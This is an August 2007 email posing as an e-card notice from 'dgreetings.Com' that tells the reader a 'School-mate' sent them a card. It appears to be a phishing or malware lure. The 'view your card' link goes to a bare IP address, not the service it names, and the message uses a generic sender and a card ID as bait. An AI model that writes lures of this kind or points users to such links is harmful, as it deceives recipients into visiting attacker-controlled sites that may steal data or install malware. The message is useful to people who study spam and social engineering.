Subject: School-mate sent you a greeting card from dgreetings.Com!

From: "dgreetings.Com" <[email-masked]>
Date: Sat, 11 Aug 2007 10:59:08 +0800

School-mate has created a greeting card for you at dgreetings.Com,
the Internet's most popular greeting card service. 

Your greeting card ID is: e64d82c3a9ebeed435601e5ee713076a3db5733 

To see your custom greeting card, simply click on the link below: 
http://74.131.219.96/?e64d82c3a9ebeed435601e5ee713076a3db5733

Send greeting cards from dgreetings.Com whenever you want by visiting us at: 
http://dgreetings.Com/
Copyright (c) 1996-2007 dgreetings.Com All Rights Reserved